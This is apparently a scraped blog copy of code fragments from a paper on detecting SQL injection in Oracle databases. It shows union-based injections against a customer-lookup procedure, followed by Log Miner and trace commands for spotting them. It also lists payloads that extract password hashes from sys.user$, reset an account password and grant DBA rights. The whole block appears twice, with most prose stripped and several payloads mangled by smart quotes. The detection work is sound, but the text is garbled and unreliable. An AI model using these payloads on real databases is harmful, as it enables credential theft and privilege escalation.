资料:http://www.petefinnigan.com/papers/detect.sql'
a'='a' or 1=1
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
::FRED
SQL> select log_mode from v$database;
SQL> select name,value from v$parameter
2 where name in('log_archive_start','log_archive_dest');
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
log_archive_start
TRUE
log_archive_dest
/export/home/u01/app/oracle/admin/emil/archive
SQL> select name,value from v$parameter
2 where name = 'transaction_auditing';
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
transaction_auditing
TRUE
Now execute the SQL injection attempt and then use Log Miner to see what is recorded. To make the analysis easier for this example, the archive log is saved before and after to ensure only this command is in the log:
SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
SQL> connect dbsnmp/dbsnmp@emil
Connected.
SQL> set serveroutput on size 100000
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
<records snipped>
::SYS
::SYSTEM
::WKSYS
::ZULIA
PL/SQL procedure successfully completed.
SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
First create the Log Miner dictionary:
SQL> set serveroutput on size 1000000
SQL> exec dbms_logmnr_d.build('logmnr.dat','/tmp');
LogMnr Dictionary Procedure started
LogMnr Dictionary File Opened
TABLE: OBJ$ recorded in LogMnr Dictionary File
TABLE: TAB$ recorded in LogMnr Dictionary File
TABLE: COL$ recorded in LogMnr Dictionary File
TABLE: TS$ recorded in LogMnr Dictionary File
<output snipped>
Procedure executed successfully - LogMnr Dictionary Created
PL/SQL procedure successfully completed.
SQL> select name
2 from v$archived_log
3 where completion_time=(select max(completion_time) from v$archived_log);
NAME
--------------------------------------------------------------------------------
/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf
SQL>
Now load the archive log file into Log Miner:
SQL> exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW);
PL/SQL procedure successfully completed.
SQL> exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat');
PL/SQL procedure successfully completed.
SQL>
Finally, search the results:
SQL> select scn,username,timestamp,sql_redo
2 from v$logmnr_contents
SQL>
<snipped>
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
253533 DBSNMP 16-JUN-03 set transaction read write;
253533 DBSNMP 16-JUN-03 update "SYS"."AUD$" set
"ACTION#" = '101',
"RETURNCODE" = '0',
"LOGOFF$LREAD" = '228',
"LOGOFF$PREAD" = '0',
"LOGOFF$LWRITE" = '10',
"LOGOFF$DEAD" = '0',
"LOGOFF$TIME" =
TO_DATE('16-JUN-2003
12:16:12', 'DD-MON-YYYY
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
HH24:MI:SS'), "SESSIONCPU" =
'5' where "ACTION#" = '100'
and "RETURNCODE" = '0' and
"LOGOFF$LREAD" IS NULL and
"LOGOFF$PREAD" IS NULL and
"LOGOFF$LWRITE" IS NULL and
"LOGOFF$DEAD" IS NULL and
"LOGOFF$TIME" IS NULL and
"SESSIONCPU" IS NULL and ROWID
= 'AAAABiAABAAAAEWAAX';
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
253534 DBSNMP 16-JUN-03 commit;
<snipped output>
SQL> select p.spid,s.username
2 from v$session s,v$process p
3 where s.paddr=p.addr;
SPID USERNAME
--------- ------------------------------
<records snipped>
616 DBSNMP
556 SYSTEM
9 rows selected.
SQL>
To enable trace simply add the following lines to the $ORACLE_HOME/network/admin/sqlnet.ora file:
TRACE_FILE_SERVER=pf_trace.trc
TRACE_DIRECTORY_SERVER=/tmp
TRACE_LEVEL_SERVER=SUPPORT
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
PL/SQL procedure successfully completed.
exec get_cust2('x'' or ''x''=''x'' --');
exec get_cust('x'' union select sys.login_user from sys.dual where ''x''=''x');
exec get_cust('x'' union select to_char(sysdate) from sys.dual@plsq where ''x''=''x');
exec get_cust('x'' union select 1,''Y'' from sys.dual where ''x''=''x');
exec get_cust('x'' union select object_name,object_type,''x'' from user_objects where ''x''=''x');
exec get_cust('x'' union select granted_role,admin_option,default_role from user_role_privs where ''x''=''x');
exec get_cust('x'' union select privilege,admin_option,''X'' from user_sys_privs where ''x''=''x');
exec get_cust_bind('Clark');
exec get_cust_bind('x'' union select username from all_users where ''x''=''x');
select customer_phone from customers where customer_surname='x' select username from all_users where 'x'='x'
select customer_phone from customers where customer_surname='x' union select username from all_users where 'x'='x'
select customer_phone from customers where customer_surname='x' or exists (select 1 from
sys.dual) and 'x'='x'
select customer_phone from customers where customer_surname='x' or 'x'='x'
select customer_phone from customers where customer_surname='x' or 'x'='x' --' and
customer_type=1
select customer_phone from customers where customer_surname='x' union select sys.login_user from sys.dual where 'x'='x'
select customer_phone from customers where customer_surname='x' union select to_char(sysdate) from sys.dual@plsq where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where
customer_surname='x' union select 1,'Y' from sys.dual where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select object_name,object_type,'x' from user_objects where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where
customer_surname='x' union select granted_role,admin_option,default_role from user_role_privs where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where
customer_surname='x' union select privilege,admin_option,'X' from user_sys_privs where 'x'='x'
select customer_phone from customers where customer_surname=:surname::999444888
select customer_phone from customers where customer_surname=:surname
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW)
exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec sys.list_libraries(‘sys’);
exec sys.list_libraries(‘foo’’union select password from sys.user$--);
select sys.select_count(‘sys’)from dual;
select sys.select_count(‘sys’ union select password from sys.user$where name=”sys”—‘)from dual;
select sys.select_count(‘sys”union select user#from sys.user$ where name=”sys”—‘)from dual;
select sys.select_count(‘sys’’and object name=(select password from sys.user$where name=”sys”—‘)from dual;
select sys.select_count(‘foo”||scott.get_it()—‘)from dual;
call exec dbms_output.put_line(‘output’)
exec sys.new_emp(‘foo”||scott.get_it)—‘);
create or replace function rstpwd return
varchar2 authid current_user is
mystmt varchar2(200);
begin
mystmt:=’update sys.user$set password=
“fe0e8ce7c92504e9”where name=”anonymous”’;
execute immediate mystmt;
return ‘foo’;
end
/
exec sys.new_emp(‘p”||scott.rstpwd)—‘);
exec sys.anon_block(‘foobar’);
exec sys.anon_block(‘f”);execute immediate “grant dba to scott”; end;--‘);
a'='a' or 1=1
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
::FRED
SQL> select log_mode from v$database;
SQL> select name,value from v$parameter
2 where name in('log_archive_start','log_archive_dest');
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
log_archive_start
TRUE
log_archive_dest
/export/home/u01/app/oracle/admin/emil/archive
SQL> select name,value from v$parameter
2 where name = 'transaction_auditing';
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
transaction_auditing
TRUE
Now execute the SQL injection attempt and then use Log Miner to see what is recorded. To make the analysis easier for this example, the archive log is saved before and after to ensure only this command is in the log:
SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
SQL> connect dbsnmp/dbsnmp@emil
Connected.
SQL> set serveroutput on size 100000
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
<records snipped>
::SYS
::SYSTEM
::WKSYS
::ZULIA
PL/SQL procedure successfully completed.
SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
First create the Log Miner dictionary:
SQL> set serveroutput on size 1000000
SQL> exec dbms_logmnr_d.build('logmnr.dat','/tmp');
LogMnr Dictionary Procedure started
LogMnr Dictionary File Opened
TABLE: OBJ$ recorded in LogMnr Dictionary File
TABLE: TAB$ recorded in LogMnr Dictionary File
TABLE: COL$ recorded in LogMnr Dictionary File
TABLE: TS$ recorded in LogMnr Dictionary File
<output snipped>
Procedure executed successfully - LogMnr Dictionary Created
PL/SQL procedure successfully completed.
SQL> select name
2 from v$archived_log
3 where completion_time=(select max(completion_time) from v$archived_log);
NAME
--------------------------------------------------------------------------------
/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf
SQL>
Now load the archive log file into Log Miner:
SQL> exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW);
PL/SQL procedure successfully completed.
SQL> exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat');
PL/SQL procedure successfully completed.
SQL>
Finally, search the results:
SQL> select scn,username,timestamp,sql_redo
2 from v$logmnr_contents
SQL>
<snipped>
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
253533 DBSNMP 16-JUN-03 set transaction read write;
253533 DBSNMP 16-JUN-03 update "SYS"."AUD$" set
"ACTION#" = '101',
"RETURNCODE" = '0',
"LOGOFF$LREAD" = '228',
"LOGOFF$PREAD" = '0',
"LOGOFF$LWRITE" = '10',
"LOGOFF$DEAD" = '0',
"LOGOFF$TIME" =
TO_DATE('16-JUN-2003
12:16:12', 'DD-MON-YYYY
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
HH24:MI:SS'), "SESSIONCPU" =
'5' where "ACTION#" = '100'
and "RETURNCODE" = '0' and
"LOGOFF$LREAD" IS NULL and
"LOGOFF$PREAD" IS NULL and
"LOGOFF$LWRITE" IS NULL and
"LOGOFF$DEAD" IS NULL and
"LOGOFF$TIME" IS NULL and
"SESSIONCPU" IS NULL and ROWID
= 'AAAABiAABAAAAEWAAX';
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
253534 DBSNMP 16-JUN-03 commit;
<snipped output>
SQL> select p.spid,s.username
2 from v$session s,v$process p
3 where s.paddr=p.addr;
SPID USERNAME
--------- ------------------------------
<records snipped>
616 DBSNMP
556 SYSTEM
9 rows selected.
SQL>
To enable trace simply add the following lines to the $ORACLE_HOME/network/admin/sqlnet.ora file:
TRACE_FILE_SERVER=pf_trace.trc
TRACE_DIRECTORY_SERVER=/tmp
TRACE_LEVEL_SERVER=SUPPORT
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
PL/SQL procedure successfully completed.
exec get_cust2('x'' or ''x''=''x'' --');
exec get_cust('x'' union select sys.login_user from sys.dual where ''x''=''x');
exec get_cust('x'' union select to_char(sysdate) from sys.dual@plsq where ''x''=''x');
exec get_cust('x'' union select 1,''Y'' from sys.dual where ''x''=''x');
exec get_cust('x'' union select object_name,object_type,''x'' from user_objects where ''x''=''x');
exec get_cust('x'' union select granted_role,admin_option,default_role from user_role_privs where ''x''=''x');
exec get_cust('x'' union select privilege,admin_option,''X'' from user_sys_privs where ''x''=''x');
exec get_cust_bind('Clark');
exec get_cust_bind('x'' union select username from all_users where ''x''=''x');
select customer_phone from customers where customer_surname='x' select username from all_users where 'x'='x'
select customer_phone from customers where customer_surname='x' union select username from all_users where 'x'='x'
select customer_phone from customers where customer_surname='x' or exists (select 1 from
sys.dual) and 'x'='x'
select customer_phone from customers where customer_surname='x' or 'x'='x'
select customer_phone from customers where customer_surname='x' or 'x'='x' --' and
customer_type=1
select customer_phone from customers where customer_surname='x' union select sys.login_user from sys.dual where 'x'='x'
select customer_phone from customers where customer_surname='x' union select to_char(sysdate) from sys.dual@plsq where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where
customer_surname='x' union select 1,'Y' from sys.dual where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select object_name,object_type,'x' from user_objects where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where
customer_surname='x' union select granted_role,admin_option,default_role from user_role_privs where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where
customer_surname='x' union select privilege,admin_option,'X' from user_sys_privs where 'x'='x'
select customer_phone from customers where customer_surname=:surname::999444888
select customer_phone from customers where customer_surname=:surname
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW)
exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec sys.list_libraries(‘sys’);
exec sys.list_libraries(‘foo’’union select password from sys.user$--);
select sys.select_count(‘sys’)from dual;
select sys.select_count(‘sys’ union select password from sys.user$where name=”sys”—‘)from dual;
select sys.select_count(‘sys”union select user#from sys.user$ where name=”sys”—‘)from dual;
select sys.select_count(‘sys’’and object name=(select password from sys.user$where name=”sys”—‘)from dual;
select sys.select_count(‘foo”||scott.get_it()—‘)from dual;
call exec dbms_output.put_line(‘output’)
exec sys.new_emp(‘foo”||scott.get_it)—‘);
create or replace function rstpwd return
varchar2 authid current_user is
mystmt varchar2(200);
begin
mystmt:=’update sys.user$set password=
“fe0e8ce7c92504e9”where name=”anonymous”’;
execute immediate mystmt;
return ‘foo’;
end
/
exec sys.new_emp(‘p”||scott.rstpwd)—‘);
exec sys.anon_block(‘foobar’);
exec sys.anon_block(‘f”);execute immediate “grant dba to scott”; end;--‘);
56
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
